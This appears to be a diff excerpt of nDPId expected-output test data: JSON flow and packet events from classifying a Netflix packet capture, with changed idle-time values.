+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"} 
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1484319118629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1484319118629,"pkt":"gCqoTGHM5JjWH70UCABFAABDkmsAAP8RpeXAqAEHwKgBAd8FADUALzVHkfABAAABAAAAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQAB"} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1484319118652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1484319118652,"pkt":"5JjWH70UgCqoTGHMCABFAABj4U1AAEAR1ePAqAEBwKgBBwA13wUATx78kfCBgAABAAIAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQABwAwAAQABAAAADAAEuBnMCsAMAAEAAQAAAAwABLgZzBk="} 
00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1484319118658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118658,"pkt":"gCqoTGHM5JjWH70UCABFAABAEThAAEAG46zAqAEHuBnMCtAEAFDFgkYhAAAAALAC\/\/\/8GgAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6901,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1484319118672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118672,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0APyPQT8JksS\/qAScSAMhgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"} 
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1484319118658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118658,"pkt":"gCqoTGHM5JjWH70UCABFAABAEThAAEAG46zAqAEHuBnMCtAEAFDFgkYhAAAAALAC\/\/\/8GgAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6901,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1484319118672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118672,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0APyPQT8JksS\/qAScSAMhgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"} 
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319030789,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 